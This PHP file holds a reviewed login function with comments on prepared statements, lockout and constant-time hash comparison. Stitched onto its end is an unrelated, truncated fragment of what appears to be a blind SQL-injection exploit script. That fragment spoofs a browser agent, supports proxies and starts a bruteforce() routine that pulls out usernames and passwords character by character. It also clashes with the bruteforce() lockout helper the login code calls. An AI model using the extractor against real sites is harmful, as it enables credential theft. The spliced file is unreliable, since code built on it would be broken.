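/**
 * Check a submitted e-mail/password pair against the `login` table.
 *
 * Flow: look the account up by e-mail with a prepared statement, stop if
 * bruteforce() reports the account as locked, recompute the salted SHA-1
 * digest of the submitted password and compare it with the stored one.
 * On a match ins_token() is called; on a mismatch one row is added to
 * `attempts` so the lockout check has something to count.
 *
 * NOTE(review): a single round of salted SHA-1 is far too fast for password
 * storage. Moving to password_hash()/password_verify() requires re-hashing
 * the stored values (e.g. on the next successful login), so the digest
 * scheme is left unchanged here and only the comparison is hardened.
 *
 * NOTE(review): the locked-account redirect only happens for e-mails that
 * exist, so the response differs between known and unknown accounts.
 *
 * @param string $email    E-mail address used as the lookup key.
 * @param string $password Plain-text password as submitted.
 * @param object $db       Connection exposing prepare(); the statement API
 *                         used below is mysqli-style - confirm against caller.
 *
 * @return bool true only when the password matches; false for an unknown
 *              e-mail, a locked account, a wrong password or a failed prepare.
 */
function login_pro($email, $password, $db)
{
    // NOTE(review): the column is spelled "usename" in this query; confirm it
    // matches the schema. It is kept as written because the schema is not visible.
    $query = $db->prepare("Select id,usename,password,salt from login where email=?");
    if (!$query) {
        // Fail closed instead of falling off the end of the function.
        return false;
    }

    $query->bind_param('s', $email);
    $query->execute();
    $query->store_result();
    $query->bind_result($user_id, $username, $p_word, $salt);
    $query->fetch();

    if ($query->num_rows != 1) {
        // No user exists (or the e-mail is not unique): nothing to verify.
        return false;
    }

    if (bruteforce($user_id, $db) == true) {
        // Account is locked. Return right after queuing the redirect so a
        // locked account can never reach the password check below.
        header('Location: acclocked.php');
        return false;
    }

    // Hash only once a row is known to exist, so $salt is always populated.
    $digest = hash('sha1', $password . $salt);

    // hash_equals() compares byte-for-byte in constant time. The loose `==`
    // it replaces compares two numeric-looking strings as numbers, so two
    // different hex digests of the form "0e<digits>" were treated as equal.
    if (hash_equals((string) $p_word, $digest)) {
        ins_token($db, $email);
        return true;
    }

    // Password is not correct: record the attempt with bound parameters
    // rather than interpolating values into the SQL text.
    $now = time();
    $attempt = $db->prepare("INSERT INTO attempts(user_id, time) VALUES (?, ?)");
    $recorded = $attempt
        && $attempt->bind_param('si', $user_id, $now)
        && $attempt->execute();
    if (!$recorded) {
        // A lost attempt row weakens the lockout counter, so make it visible.
        error_log('login_pro: failed to record login attempt');
    }

    return false;
}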
$xpl->agent('Mozilla Firefox'); $xpl->allowredirection(0); $xpl->cookiejar(0); if ($proxy) { $xpl->proxy($proxy); } if ($proxyauth) { $xpl->proxyauth($proxyauth); } if ($debug) { debug(1); } print "\nUsername: "******"\nPassword: "; bruteforce('pwd'); exit(0); function bruteforce($field) { global $url, $xpl, $tblprfix, $truetime, $debug, $benchmark, $sql, $bef, $aft, $fak, $b, $c, $f, $dfield, $a, $result; $a = 0; $v = ''; $dfield = $field; if (eregi('a', $field)) { $b = '-1'; $c = '127'; } else { $b = '46'; $c = '70'; } # pwd charset